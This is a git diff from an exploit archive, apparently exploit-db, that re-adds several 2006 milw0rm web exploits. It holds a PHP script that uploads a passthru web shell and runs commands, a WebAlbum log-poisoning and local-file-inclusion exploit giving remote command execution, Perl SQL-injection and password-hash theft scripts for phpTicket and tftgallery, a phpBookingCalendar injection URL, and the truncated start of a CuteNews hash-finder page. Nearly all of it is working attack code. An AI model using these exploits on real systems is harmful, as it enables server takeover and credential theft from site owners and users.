proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + return (float) $sec + ((float) $usec * 100000); +} + +$host=$argv[1]; +$path=$argv[2]; +$action=$argv[3]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + + +srand(make_seed()); +$anumber = rand(1,99999); + + echo "[1] Uploading a shell...\r\n"; +$data='-----------------------------7d61592213049c +Content-Disposition: form-data; name="dir" + +/ +-----------------------------7d61592213049c +Content-Disposition: form-data; name="upload"; filename="suntzu'.$anumber.'.php" +Content-Type: text/plain + +<?php +if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);} +ini_set("max_execution_time",0); +echo "*delim*"; +passthru($_GET[cmd]); +echo "*delim*"; +?> +-----------------------------7d61592213049c +Content-Disposition: form-data; name="submit" + +Upload +-----------------------------7d61592213049c-- +'; + $packet="POST ".$p."inc/htmlarea/plugins/FileManager/images.php HTTP/1.0\r\n"; + $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61592213049c\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Content-Length: 
".strlen($data)."\r\n"; + $packet.="Connection: close\r\n\r\n"; + $packet.=$data; + #echo quick_dump($packet); + sendpacketii($packet); + sleep(1); + echo "[2] Launch commands...\r\n"; + $packet="GET ".$p."filemanager/suntzu".$anumber.".php?cmd=".$cmd." HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + #echo quick_dump($packet); + sendpacketii($packet); + if (strstr($html,"*delim*")) + { + echo "Exploit succeeded...\r\n\r\n"; + $temp=explode("*delim*",$html); + echo $temp[1]; + } + else + {echo "Exploit failed...\r\n";} +?> + +# milw0rm.com [2006-03-22] diff --git a/platforms/php/webapps/1608.php b/platforms/php/webapps/1608.php index f9b2ae66d..a58be3ac6 100755 --- a/platforms/php/webapps/1608.php +++ b/platforms/php/webapps/1608.php 
@@ -1,188 +1,188 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "WebAlbum <= 2.02pl \$_COOKIE[skin2] remote cmmnds xctn \r\n"; -echo "by rgod rgod@autistici.org\r\n"; -echo "site: http://retrogod.altervista.org\r\n\r\n"; -echo "-> this works with magic_quotes_gpc=Off\r\n"; -echo "dork: WEBalbum 2004-2006 duda\r\n"; - -if ($argc<4) { -echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to WebAlbum\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /webalbum/ cat ./inc/config.php\n"; -echo "php ".$argv[0]." localhost /webalbum/ ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; -die; -} - -/*short explaination: - software site: http://www.web-album.org/ - - this app stores paths inside cookies, but they are not sanitized before to - include files. We need a null char to break path to apache log files, so it - works with magic_quotes_gpc=Off. 
- */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -echo "[1] Injecting some code in log files...\r\n"; -$CODE ='suntzu<?php passthru($_GET[cmd]);die;?>suntzu'; -$packet.="GET ".$path.$CODE." HTTP/1.1\r\n"; -$packet.="User-Agent: ".$CODE."\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: close\r\n\r\n"; -#debug -#echo quick_dump($packet); -sendpacketii($packet); - -# fill with possible locations -$paths= array ( -"../../../../../../../../../../var/log/httpd/access_log", -"../../../../../../../../../../var/log/httpd/error_log", -"../apache/logs/error.log", -"../apache/logs/access.log", -"../../apache/logs/error.log", -"../../apache/logs/access.log", -"../../../apache/logs/error.log", -"../../../apache/logs/access.log", -"../../../../apache/logs/error.log", -"../../../../apache/logs/access.log", -"../../../../../apache/logs/error.log", -"../../../../../apache/logs/access.log", -"../logs/error.log", -"../logs/access.log", -"../../logs/error.log", -"../../logs/access.log", -"../../../logs/error.log", -"../../../logs/access.log", -"../../../../logs/error.log", -"../../../../logs/access.log", -"../../../../../logs/error.log", -"../../../../../logs/access.log", -"../../../../../../../../../../etc/httpd/logs/acces_log", -"../../../../../../../../../../etc/httpd/logs/acces.log", -"../../../../../../../../../../etc/httpd/logs/error_log", -"../../../../../../../../../../etc/httpd/logs/error.log", -"../../../../../../../../../../var/www/logs/access_log", -"../../../../../../../../../../var/www/logs/access.log", -"../../../../../../../../../../usr/local/apache/logs/access_log", -"../../../../../../../../../../usr/local/apache/logs/access.log", -"../../../../../../../../../../var/log/apache/access_log", -"../../../../../../../../../../var/log/apache/access.log", -"../../../../../../../../../../var/log/access_log", -"../../../../../../../../../../var/www/logs/error_log", 
-"../../../../../../../../../../var/www/logs/error.log", -"../../../../../../../../../../usr/local/apache/logs/error_log", -"../../../../../../../../../../usr/local/apache/logs/error.log", -"../../../../../../../../../../var/log/apache/error_log", -"../../../../../../../../../../var/log/apache/error.log", -"../../../../../../../../../../var/log/access_log", -"../../../../../../../../../../var/log/error_log" -); -for ($i=0; $i<=count($paths)-1; $i++) -{ -$a=$i+2; -echo "[".$a."] trying with ".$paths[$i]."%00 ...\r\n"; -$packet ="GET ".$p."start.php?cmd=".$cmd." HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: skin2=".$paths[$i]."%00;\r\n"; -$packet.="Connection: Close\r\n\r\n"; -//echo quick_dump($packet); -sendpacketii($packet); -if (strstr($html,"suntzu")) -{ - echo "Exploit succeeded...\r\n"; - $temp=explode("suntzu",$html); - die($temp[1]); -} -} -//if you are here... -echo "Exploit failed..."; -?> - -# milw0rm.com [2006-03-25] +#!/usr/bin/php -q -d short_open_tag=on +<? +echo "WebAlbum <= 2.02pl \$_COOKIE[skin2] remote cmmnds xctn \r\n"; +echo "by rgod rgod@autistici.org\r\n"; +echo "site: http://retrogod.altervista.org\r\n\r\n"; +echo "-> this works with magic_quotes_gpc=Off\r\n"; +echo "dork: WEBalbum 2004-2006 duda\r\n"; + +if ($argc<4) { +echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to WebAlbum\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /webalbum/ cat ./inc/config.php\n"; +echo "php ".$argv[0]." localhost /webalbum/ ls -la -p81\r\n"; +echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; +die; +} + +/*short explaination: + software site: http://www.web-album.org/ + + this app stores paths inside cookies, but they are not sanitized before to + include files. 
We need a null char to break path to apache log files, so it + works with magic_quotes_gpc=Off. + */ +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +echo "[1] Injecting some code in log files...\r\n"; +$CODE ='suntzu<?php passthru($_GET[cmd]);die;?>suntzu'; +$packet.="GET ".$path.$CODE." HTTP/1.1\r\n"; +$packet.="User-Agent: ".$CODE."\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: close\r\n\r\n"; +#debug +#echo quick_dump($packet); +sendpacketii($packet); + +# fill with possible locations +$paths= array ( +"../../../../../../../../../../var/log/httpd/access_log", +"../../../../../../../../../../var/log/httpd/error_log", +"../apache/logs/error.log", +"../apache/logs/access.log", +"../../apache/logs/error.log", +"../../apache/logs/access.log", +"../../../apache/logs/error.log", +"../../../apache/logs/access.log", +"../../../../apache/logs/error.log", +"../../../../apache/logs/access.log", +"../../../../../apache/logs/error.log", +"../../../../../apache/logs/access.log", +"../logs/error.log", +"../logs/access.log", +"../../logs/error.log", +"../../logs/access.log", +"../../../logs/error.log", +"../../../logs/access.log", +"../../../../logs/error.log", +"../../../../logs/access.log", +"../../../../../logs/error.log", +"../../../../../logs/access.log", +"../../../../../../../../../../etc/httpd/logs/acces_log", +"../../../../../../../../../../etc/httpd/logs/acces.log", +"../../../../../../../../../../etc/httpd/logs/error_log", +"../../../../../../../../../../etc/httpd/logs/error.log", +"../../../../../../../../../../var/www/logs/access_log", +"../../../../../../../../../../var/www/logs/access.log", +"../../../../../../../../../../usr/local/apache/logs/access_log", +"../../../../../../../../../../usr/local/apache/logs/access.log", +"../../../../../../../../../../var/log/apache/access_log", +"../../../../../../../../../../var/log/apache/access.log", +"../../../../../../../../../../var/log/access_log", +"../../../../../../../../../../var/www/logs/error_log", 
+"../../../../../../../../../../var/www/logs/error.log", +"../../../../../../../../../../usr/local/apache/logs/error_log", +"../../../../../../../../../../usr/local/apache/logs/error.log", +"../../../../../../../../../../var/log/apache/error_log", +"../../../../../../../../../../var/log/apache/error.log", +"../../../../../../../../../../var/log/access_log", +"../../../../../../../../../../var/log/error_log" +); +for ($i=0; $i<=count($paths)-1; $i++) +{ +$a=$i+2; +echo "[".$a."] trying with ".$paths[$i]."%00 ...\r\n"; +$packet ="GET ".$p."start.php?cmd=".$cmd." HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: skin2=".$paths[$i]."%00;\r\n"; +$packet.="Connection: Close\r\n\r\n"; +//echo quick_dump($packet); +sendpacketii($packet); +if (strstr($html,"suntzu")) +{ + echo "Exploit succeeded...\r\n"; + $temp=explode("suntzu",$html); + die($temp[1]); +} +} +//if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-03-25] diff --git a/platforms/php/webapps/1609.pl b/platforms/php/webapps/1609.pl index 9cf65b133..094ed8bd8 100755 --- a/platforms/php/webapps/1609.pl +++ b/platforms/php/webapps/1609.pl 
@@ -1,116 +1,116 @@
-#!/usr/bin/perl
-
-###############################################################################
-#Copyright (C) undefined1_
-#
-#This program is free software; you can redistribute it and/or
-#modify it under the terms of the GNU General Public License
-#as published by the Free Software Foundation; either version 2
-#of the License, or (at your option) any later version.
-#
-#This program is distributed in the hope that it will be useful,
-#but WITHOUT ANY WARRANTY; without even the implied warranty of
-#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-#GNU General Public License for more details.
-#
-#You should have received a copy of the GNU General Public License
-#along with this program; if not, write to the Free Software
-#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
-#
-###############################################################################
-
-use strict;
-use IO::Socket;
-
-$| = 1;
-printf ":: php ticket <= 0.71 exploit (privilege escalation) - by undefined1_ @ bash-x.net/undef/ ::\n\n\n";
-
-
-my $website = shift || usage();
-my $user = shift || usage();
-my $password = shift || usage();
-
-my $path = "/";
-my $site = $website;
-if(index($website, "/") != -1)
-{
- my $index = index($website, "/");
- $path = substr($website, $index);
- $site = substr($website, 0, $index);
- if(substr($path, length($path)-1) ne "/")
- {
- $path .= "/";
- }
-}
-
-
-my $eop = "\r\nHost: $site\r\n";
-$eop .= "User-Agent: Mozilla/5.0\r\n";
-$eop .= "Connection: close\r\n";
-
-
-
-my $packet1 = "POST ".$path."search.php HTTP/1.1\r\n";
-my $postdata = "Content-Type: application/x-www-form-urlencoded\r\n";
-$postdata .= "Host: $site\r\n";
-$postdata .= "User-Agent: Mozilla/5.0\r\n";
-$postdata .= "Connection: close\r\n";
-$postdata .= "Content-Length: 31\r\n";
-$postdata .= "Cookie: PHPSESSID=aeb241ebabb33d5fb5ba756453f725e8\r\n\r\n";
-$postdata .= "frm_user=".$user."&frm_passwd=".$password;
-my $data = sendpacket($site, $packet1.$postdata);
-
-
-
-my $packet2 = "POST ".$path."search.php HTTP/1.1\r\n";
-$postdata = "Content-Type: application/x-www-form-urlencoded\r\n";
-$postdata .= "Host: $site\r\n";
-$postdata .= "User-Agent: Mozilla/5.0\r\n";
-$postdata .= "Connection: close\r\n";
-$postdata .= "Content-Length: 215\r\n";
-$postdata .= "Cookie: PHPSESSID=aeb241ebabb33d5fb5ba756453f725e8\r\n\r\n";
-$postdata .= "frm_query=a&frm_search_in=1%3D0+union+all+select+1%2C1%2C1%2C1%2C1%2C1%2CCONCAT%280x30576e656420%2Cuser%2C0x20%2Cpasswd%29%2C1%2C1%2C1%2C1%2C1%2C1+from+user--&frm_ordertype=date&frm_order_desc=DESC&frm_querytype=%25";
-$data = sendpacket($site, $packet2.$postdata);
-
-
-print "password are encrypted with the PASSWORD() function of mysql\n\n";
-
-printf("username%-20spassword\n", " ");
-printf("--------%-20s--------\n", " ");
-my $index = 0;
-while(($index = index($data,"0Wned ", $index)) != -1)
-{
- $index += 6;
- my $index2 = index($data," ", $index);
- my $index3 = index($data,"</A>", $index2);
- printf("%s%-20s%s\n", substr($data,$index,$index2-$index) , " ", substr($data,$index2+1,$index3-($index2+1)));
- $index = $index3+4;
-}
-
-
-sub sendpacket(\$,\$) {
- my $server = shift;
- my $request = shift;
-
- my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => "80") or die "[-] Could not connect to $server:80 $!\n";
- print $sock "$request";
-
-
- my $data = "";
- my $answer;
- while($answer = <$sock>)
- {
- $data .= $answer;
- }
-
- close($sock);
- return $data;
-}
-
-sub usage() {
- printf "usage: %s <website> <user> <password>\n", $0;
- printf "exemple: %s www.site.com/phpticket/\n", $0;
- exit;
-}
-
-# milw0rm.com [2006-03-25]
+#!/usr/bin/perl
+
+###############################################################################
+#Copyright (C) undefined1_
+#
+#This program is free software; you can redistribute it and/or
+#modify it under the terms of the GNU General Public License
+#as published by the Free Software Foundation; either version 2
+#of the License, or (at your option) any later version.
+#
+#This program is distributed in the hope that it will be useful,
+#but WITHOUT ANY WARRANTY; without even the implied warranty of
+#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+#GNU General Public License for more details.
+#
+#You should have received a copy of the GNU General Public License
+#along with this program; if not, write to the Free Software
+#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
+#
+###############################################################################
+
+use strict;
+use IO::Socket;
+
+$| = 1;
+printf ":: php ticket <= 0.71 exploit (privilege escalation) - by undefined1_ @ bash-x.net/undef/ ::\n\n\n";
+
+
+my $website = shift || usage();
+my $user = shift || usage();
+my $password = shift || usage();
+
+my $path = "/";
+my $site = $website;
+if(index($website, "/") != -1)
+{
+ my $index = index($website, "/");
+ $path = substr($website, $index);
+ $site = substr($website, 0, $index);
+ if(substr($path, length($path)-1) ne "/")
+ {
+ $path .= "/";
+ }
+}
+
+
+my $eop = "\r\nHost: $site\r\n";
+$eop .= "User-Agent: Mozilla/5.0\r\n";
+$eop .= "Connection: close\r\n";
+
+
+
+my $packet1 = "POST ".$path."search.php HTTP/1.1\r\n";
+my $postdata = "Content-Type: application/x-www-form-urlencoded\r\n";
+$postdata .= "Host: $site\r\n";
+$postdata .= "User-Agent: Mozilla/5.0\r\n";
+$postdata .= "Connection: close\r\n";
+$postdata .= "Content-Length: 31\r\n";
+$postdata .= "Cookie: PHPSESSID=aeb241ebabb33d5fb5ba756453f725e8\r\n\r\n";
+$postdata .= "frm_user=".$user."&frm_passwd=".$password;
+my $data = sendpacket($site, $packet1.$postdata);
+
+
+
+my $packet2 = "POST ".$path."search.php HTTP/1.1\r\n";
+$postdata = "Content-Type: application/x-www-form-urlencoded\r\n";
+$postdata .= "Host: $site\r\n";
+$postdata .= "User-Agent: Mozilla/5.0\r\n";
+$postdata .= "Connection: close\r\n";
+$postdata .= "Content-Length: 215\r\n";
+$postdata .= "Cookie: PHPSESSID=aeb241ebabb33d5fb5ba756453f725e8\r\n\r\n";
+$postdata .= "frm_query=a&frm_search_in=1%3D0+union+all+select+1%2C1%2C1%2C1%2C1%2C1%2CCONCAT%280x30576e656420%2Cuser%2C0x20%2Cpasswd%29%2C1%2C1%2C1%2C1%2C1%2C1+from+user--&frm_ordertype=date&frm_order_desc=DESC&frm_querytype=%25";
+$data = sendpacket($site, $packet2.$postdata);
+
+
+print "password are encrypted with the PASSWORD() function of mysql\n\n";
+
+printf("username%-20spassword\n", " ");
+printf("--------%-20s--------\n", " ");
+my $index = 0;
+while(($index = index($data,"0Wned ", $index)) != -1)
+{
+ $index += 6;
+ my $index2 = index($data," ", $index);
+ my $index3 = index($data,"</A>", $index2);
+ printf("%s%-20s%s\n", substr($data,$index,$index2-$index) , " ", substr($data,$index2+1,$index3-($index2+1)));
+ $index = $index3+4;
+}
+
+
+sub sendpacket(\$,\$) {
+ my $server = shift;
+ my $request = shift;
+
+ my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => "80") or die "[-] Could not connect to $server:80 $!\n";
+ print $sock "$request";
+
+
+ my $data = "";
+ my $answer;
+ while($answer = <$sock>)
+ {
+ $data .= $answer;
+ }
+
+ close($sock);
+ return $data;
+}
+
+sub usage() {
+ printf "usage: %s <website> <user> <password>\n", $0;
+ printf "exemple: %s www.site.com/phpticket/\n", $0;
+ exit;
+}
+
+# milw0rm.com [2006-03-25]
diff --git a/platforms/php/webapps/1610.txt b/platforms/php/webapps/1610.txt
index bae637912..d8408e04f 100755
--- a/platforms/php/webapps/1610.txt
+++ b/platforms/php/webapps/1610.txt
@@ -1,10 +1,10 @@
-PoC by undefined1_ @ bash-x.net/undef/
-
-phpBookingCalendar <= 1.0c
-"A PHP/MySQL Booking Calendar Application."
-http://www.jjwdesign.com/booking_calendar.html
-
-phpBookingCalendar is prone to a sql injection attack. the sql injection works regardless of any magic_quotes_gpc settings.
-www.site.com/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user
-
-# milw0rm.com [2006-03-25]
+PoC by undefined1_ @ bash-x.net/undef/
+
+phpBookingCalendar <= 1.0c
+"A PHP/MySQL Booking Calendar Application."
+http://www.jjwdesign.com/booking_calendar.html
+
+phpBookingCalendar is prone to a sql injection attack. the sql injection works regardless of any magic_quotes_gpc settings.
+www.site.com/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user
+
+# milw0rm.com [2006-03-25]
diff --git a/platforms/php/webapps/1611.pl b/platforms/php/webapps/1611.pl
index 92a5b5296..fb98ffcb7 100755
--- a/platforms/php/webapps/1611.pl
+++ b/platforms/php/webapps/1611.pl
@@ -1,107 +1,107 @@ -#!/usr/bin/perl - -############################################################################### -#Copyright (C) undefined1_ -# -#This program is free software; you can redistribute it and/or -#modify it under the terms of the GNU General Public License -#as published by the Free Software Foundation; either version 2 -#of the License, or (at your option) any later version. -# -#This program is distributed in the hope that it will be useful, -#but WITHOUT ANY WARRANTY; without even the implied warranty of -#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -#GNU General Public License for more details. -# -#You should have received a copy of the GNU General Public License -#along with this program; if not, write to the Free Software -#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. -# -############################################################################### - -use strict; -use IO::Socket; - -$| = 1; -printf ":: tftgallery 0.10 exploit - by undefined1_ @ bash-x.net/undef/ ::\n\n\n"; - - -my $website = shift || usage(); - -my $path = "/"; -my $site = $website; -if(index($website, "/") != -1) -{ - my $index = index($website, "/"); - $path = substr($website, $index); - $site = substr($website, 0, $index); - if(substr($path, length($path)-1) ne "/") - { - $path .= "/"; - } -} - - -my $eop = "\r\nHost: $site\r\n"; -$eop .= "User-Agent: Mozilla/5.0\r\n"; -$eop .= "Connection: close\r\n\r\n"; - - -my $packet1 = "GET ".$path."admin/passwd HTTP/1.1"; -my $data = sendpacket($site, $packet1.$eop); - -if($data !~ /HTTP\/1.1 200 OK/) -{ - die "failed to retrieve the admin password\n"; -} - -my $password = ""; -if (index($data, "\r\n\r\n") != -1) -{ - $password = substr($data, index($data, "\r\n\r\n")+4); - chomp $password; -} -else -{ - die "failed to retrieve the admin password\n"; -} - -print "The password hash is: '$password'\n"; -if(crypt("admin","tftgallery") eq $password) -{ - print "The plaintext 
password is: 'admin'\n"; -} -else -{ - die "Use john the ripper, luke!\n"; -} - - - - -sub sendpacket(\$,\$) { - my $server = shift; - my $request = shift; - - my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => "80") or die "[-] Could not connect to $server:80 $!\n"; - print $sock "$request"; - - - my $data = ""; - my $answer; - while($answer = <$sock>) - { - $data .= $answer; - } - - close($sock); - return $data; -} - -sub usage() { - printf "usage: %s <website> [password]\n", $0; - printf "ex. : %s www.site.com/tftgallery/\n", $0; - exit; -} - -# milw0rm.com [2006-03-25] +#!/usr/bin/perl + +############################################################################### +#Copyright (C) undefined1_ +# +#This program is free software; you can redistribute it and/or +#modify it under the terms of the GNU General Public License +#as published by the Free Software Foundation; either version 2 +#of the License, or (at your option) any later version. +# +#This program is distributed in the hope that it will be useful, +#but WITHOUT ANY WARRANTY; without even the implied warranty of +#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +#GNU General Public License for more details. +# +#You should have received a copy of the GNU General Public License +#along with this program; if not, write to the Free Software +#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+# +############################################################################### + +use strict; +use IO::Socket; + +$| = 1; +printf ":: tftgallery 0.10 exploit - by undefined1_ @ bash-x.net/undef/ ::\n\n\n"; + + +my $website = shift || usage(); + +my $path = "/"; +my $site = $website; +if(index($website, "/") != -1) +{ + my $index = index($website, "/"); + $path = substr($website, $index); + $site = substr($website, 0, $index); + if(substr($path, length($path)-1) ne "/") + { + $path .= "/"; + } +} + + +my $eop = "\r\nHost: $site\r\n"; +$eop .= "User-Agent: Mozilla/5.0\r\n"; +$eop .= "Connection: close\r\n\r\n"; + + +my $packet1 = "GET ".$path."admin/passwd HTTP/1.1"; +my $data = sendpacket($site, $packet1.$eop); + +if($data !~ /HTTP\/1.1 200 OK/) +{ + die "failed to retrieve the admin password\n"; +} + +my $password = ""; +if (index($data, "\r\n\r\n") != -1) +{ + $password = substr($data, index($data, "\r\n\r\n")+4); + chomp $password; +} +else +{ + die "failed to retrieve the admin password\n"; +} + +print "The password hash is: '$password'\n"; +if(crypt("admin","tftgallery") eq $password) +{ + print "The plaintext password is: 'admin'\n"; +} +else +{ + die "Use john the ripper, luke!\n"; +} + + + + +sub sendpacket(\$,\$) { + my $server = shift; + my $request = shift; + + my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => "80") or die "[-] Could not connect to $server:80 $!\n"; + print $sock "$request"; + + + my $data = ""; + my $answer; + while($answer = <$sock>) + { + $data .= $answer; + } + + close($sock); + return $data; +} + +sub usage() { + printf "usage: %s <website> [password]\n", $0; + printf "ex. : %s www.site.com/tftgallery/\n", $0; + exit; +} + +# milw0rm.com [2006-03-25] diff --git a/platforms/php/webapps/1612.php b/platforms/php/webapps/1612.php index 6fa4e6751..1d1281395 100755 --- a/platforms/php/webapps/1612.php +++ b/platforms/php/webapps/1612.php 
@@ -1,188 +1,188 @@ -<?php -// Happy NEW Iranian year . -// Happy Norouz ( PERSIAN celebration ) -// CuteNews 1.4.1 (CutePHP.com) Hash password Finder -// by Hamid Ebadi -// http://hamid.ir -// Bug Discovered and Exploited by Hamid Ebadi .: Hamid Network Security Team :. -// run it from your browser... -// make these changes in php.ini if you have troubles with this script - -//allow_call_time_pass_reference = on -//register_globals = On - -error_reporting(0); -echo '<head><title>CuteNews 1.4.1 user Hash password Finder - - - -

CuteNews 1.4.1 (and Below) user Hash password Finder

-

Security ? .

-

Bug Discovered and Exploited by Hamid Ebadi .: Hamid Network Security Team :.

-

Happy Norouz ( PERSIAN new year celebration ) Greetz to all Iranian Hackers spacially my friends in ihsteam.com c0d3r.org kapda.ir simorgh-ev.com hat-squad.com blacknews.ws ashiyane.com websecurity.ir crouz.com shabgard.org hackerz.ir and ...

- - - -

read this paper about CuteNews 1.4.1 vulnerability

- - - - -
-
-

- - hostname (ex: www.sitename.com)

-

- - path (ex: /cutenews/example2.php )

-

- - specify a port other than 80 (default value)

-

- - send exploit through an HTTP proxy (ip:port)

-

- - specify a file other than /../users.db.php%00 to read

-

- -

-

Spacial THX : rgod at http://rgod.altervista.org for his great codes (i just change few lines of RGOD old NETQUERY remote commands execution exploit)

-
